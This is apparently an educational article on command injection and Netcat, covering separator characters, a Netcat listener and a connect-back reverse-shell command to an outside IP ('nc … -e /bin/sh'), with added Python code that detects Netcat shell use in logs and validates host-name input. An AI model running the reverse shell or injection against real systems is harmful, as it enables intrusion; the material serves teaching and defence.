Introduction
In this article, we are going to look at a Command Injection exercise that uses Netcat. Command Injection is an attack on a web application that offers functions such as nslookup, whois, ping, traceroute and similar tools from a web page. The vulnerability can be tested with special characters such as the semicolon “;”, the pipe “|”, “||”, “&” or “&&”, which are appended to the input the application expects, e.g. (www.mycompany.com), followed by a command, e.g. (cat/here/pwd). Such commands may be used to obtain confidential data or to carry out any other malicious action the attacker chooses, using the host’s operating system commands. If the input is not properly validated or sanitized, these unintended commands are executed.
An attacker may do anything from viewing configuration files to modifying or deleting data, but what is possible depends on the level of privilege the application runs with. Command Injection takes advantage of application functionality that executes system commands: it builds on the application’s normal behavior to execute unintended commands.
Since we are going to be using a Netcat exercise in this article, it is good practice that we understand what it is and its uses before we dive into our primary exercise.
What is Netcat?
Netcat is a network utility that is used to read and write data across TCP and UDP network connections. It is also known as the Swiss Army Knife of Networking because of its versatility. Its features include debugging, port listening, port scanning, port redirection, and it has backdoor capabilities. Netcat can be used to produce a reverse shell on the web server, given that it is installed there, which connects back to our machine and yields complete control over the system.
The following are some of the available Netcat Commands:
- Port scanning
- Scripting
- Shell Scripting
- TCP Server and TCP Client Commands
- Prevent DNS Lookup
- Create a Chat or Web Server
- ITEM with Netcat commands
- HTTP Requests with Netcat commands
- Verbose Scan with Netcat commands
- Launching Reverse (Backdoor) Shells
You can transfer files directly through Netcat or use it as a backdoor into other networked systems. It functions as a back-end tool that allows for port scanning and port listening.
Now that we know what Netcat is and its capabilities, let's now show how it can be used to execute certain commands.
First of all, let us find out how to download Netcat on our Windows machine:
Run the following commands:
C:\Windows\system32>cd C:\Users\vicki\Desktop
C:\Users\vicki\Desktop>cd nc111nt
C:\Users\vicki\Desktop\nc111nt>nc
Cmd line: nc.exe -h
After the last command, you should get the following output to show you that you have successfully installed Netcat Tool on your Windows Machine.
[v1.11 NT www.rodneybeede.com/]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options
-d              detach from console, background mode
-g gateway      source-routing hop point[s], up to 8
-G num          source-routing pointer: 4, 8, 12, ...
-h              this cruft
-i secs         delay interval for lines sent, ports scanned
-l              listen mode, for inbound connects
-L              listen harder, re-listen on socket close
-n              numeric-only IP addresses, no DNS
-o file         hex dump of traffic
-p port         local port number
-r              randomize local and remote ports
-s addr         local source address
-u              UDP mode
-v              verbose [use twice to be more verbose]
-w secs         timeout for connects and final net reads
-z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
To start listening on a port you can try the following command:
C:\Users\vicki\Desktop\nc111nt>nc.exe -nlvp 4444
And this is what you should get in return:
listening on [any] 4444 ...
Besides listening on ports, you could also use some of Netcat’s parameters, such as:
-n
Which simply specifies that Netcat should not do DNS or service lookups on any specified address or port number. We also have:
-p
Which specifies what port number Netcat is going to be connecting from. Then we also have:
-v
Which tells Netcat to give more verbose output.
-l
For listening.
So what you need is another machine on which you can listen and execute commands, so that you can receive data from that client. Netcat uses a client-server relationship in which one side listens and receives data, if the application allows it.
Netcat: Get a Shell
By using this command line in Netcat:
nc -l -p 1234
This opens a listener for incoming connections: -l opens the listener and -p assigns the port number.
nc 192.168.3.245 1234 -e /bin/sh
This connects to IP address 192.168.3.245 on port 1234; -e /bin/sh executes a shell whose input and output are directed back to our system, which lets us run commands from our own terminal.
root@kali: nc -l -p 1234
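From the defender’s side, the listener/connect-back exchange above leaves a clear trace in process-creation logs: a Netcat binary started with -e (or -c) pointing at a shell, often under a web-service account. The following Python script is an added example, not part of the original article; it parses a few constructed log lines (the "pid=… ppid=… user=… cmd=…" format is an assumption made for illustration) and labels Netcat invocations so that an analyst can separate a plain listener from a shell hand-off.

```python
import re
import shlex

# Constructed sample process-creation log lines (not taken from the article).
# The key=value layout below is an assumed format for this illustration.
SAMPLE_LOGS = [
    'pid=4012 ppid=3991 user=www-data cmd="nslookup www.mycompany.com"',
    'pid=4013 ppid=3991 user=www-data cmd="nc 192.168.3.245 1234 -e /bin/sh"',
    'pid=4014 ppid=4001 user=vicki cmd="nc -l -p 1234"',
    'pid=4015 ppid=3991 user=www-data cmd="sh -c \'ping -c 1 10.0.0.5\'"',
]

LOG_RE = re.compile(r'pid=(\d+) ppid=(\d+) user=(\S+) cmd="(.*)"$')
NETCAT_NAMES = {"nc", "nc.exe", "ncat", "netcat"}
SHELLS = {"/bin/sh", "/bin/bash", "sh", "bash", "cmd.exe", "powershell.exe"}
WEB_SERVICE_USERS = {"www-data", "apache", "nginx", "iis apppool"}


def parse_line(line):
    """Turn one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    pid, ppid, user, cmd = m.groups()
    return {"pid": int(pid), "ppid": int(ppid), "user": user,
            "argv": shlex.split(cmd)}


def classify(event):
    """Label a parsed event: shell hand-off, listener, other Netcat use, or None."""
    argv = event["argv"]
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1].lower()
    if prog not in NETCAT_NAMES:
        return None
    opts = argv[1:]
    # "-e /bin/sh" (or "-c") is the pattern the article's connect-back command uses.
    for flag in ("-e", "-c"):
        if flag in opts:
            idx = opts.index(flag)
            if idx + 1 < len(opts) and opts[idx + 1] in SHELLS:
                return "netcat-shell-exec"
    # Listener: -l or -L, possibly combined with other flags as in -nlvp.
    if any(a.startswith("-") and ("l" in a[1:] or "L" in a[1:]) for a in opts):
        return "netcat-listener"
    return "netcat-usage"


def severity(event, label):
    """A shell hand-off from a web-service account is the case to escalate first."""
    if label == "netcat-shell-exec":
        return "high" if event["user"] in WEB_SERVICE_USERS else "medium"
    if label == "netcat-listener":
        return "medium" if event["user"] in WEB_SERVICE_USERS else "low"
    return "low"


def scan(lines):
    """Return (pid, user, label, severity) for every Netcat finding in the lines."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        label = classify(ev)
        if label:
            findings.append((ev["pid"], ev["user"], label, severity(ev, label)))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

The classifier only looks at the command line; in a real deployment you would also correlate the parent process (a shell spawned by the web server worker, as in the ppid above) before raising the alert.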
whoami
This command line will give us the current user name.
uname –a
Will give us the System information.
ps
Will show us all the currently running processes on the target.
None of the commands shown above harms the target, but attackers may go on to run other malicious commands to extend their access and damage the target’s reputation. It is therefore essential that every web application has proper input validation in place, so that Command Injection cannot be carried out and a versatile tool like Netcat is used to strengthen networks rather than to attack web applications.
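The introduction describes how a separator such as “;” or “|” turns an expected host name into two commands, and the paragraph above calls for input validation as the fix. The following Python snippet is an added example, not code from the original article: it shows the vulnerable pattern (splicing the host name into a shell command string) next to a hardened version that allow-list validates the host name and passes it to nslookup as an argument list, so no shell ever parses the user input. The function and variable names are my own; the sample inputs are constructed for the illustration.

```python
import re
import subprocess

# DNS-style host name: labels of letters, digits and inner hyphens, joined by dots.
# A leading hyphen is rejected so the value can never be read as a program option.
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def build_shell_command_vulnerable(host):
    """Vulnerable pattern (illustration only): the host name becomes part of a
    shell command string. If this string were run with shell=True, the shell
    would treat ; | || & && in the input as command separators."""
    return "nslookup " + host


def is_valid_hostname(host):
    """Allow-list check: only the characters a host name may contain."""
    return 0 < len(host) <= 253 and HOSTNAME_RE.match(host) is not None


def contains_shell_metacharacters(value):
    """Detection helper for request logging: flags the separators the
    article lists, plus a few other characters a shell treats specially."""
    return re.search(r"[;|&`$()<>\r\n]", value) is not None


def build_argv_safe(host):
    """Validate first, then build an argument list for execution without a shell."""
    if not is_valid_hostname(host):
        raise ValueError("invalid host name")
    return ["nslookup", host]


def run_lookup(host, timeout=5):
    """Run the lookup as an argv list (shell=False), so the operating system
    receives the host name as a single argument, never as shell syntax."""
    argv = build_argv_safe(host)
    result = subprocess.run(argv, capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: the first is what the form expects, the second
    # appends a separator and a harmless command, as the introduction describes.
    for candidate in ("www.mycompany.com", "www.mycompany.com; echo injected"):
        print("vulnerable string:", repr(build_shell_command_vulnerable(candidate)))
        print("metacharacters   :", contains_shell_metacharacters(candidate))
        try:
            print("safe argv        :", build_argv_safe(candidate))
        except ValueError as err:
            print("rejected         :", err)
```

Both halves matter: the argument list removes the shell from the path, and the allow-list stops values such as a leading “-” that the called program itself might misinterpret. Logging hits from contains_shell_metacharacters gives the operations team an early signal that the form is being probed.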
Conclusion
Command Injection can be very harmful to its targets, especially when a versatile tool like Netcat is misused. Fortunately there are ways to mitigate Command Injection attacks: developers should validate user input and may also use online injection testing tools to find and close such weaknesses.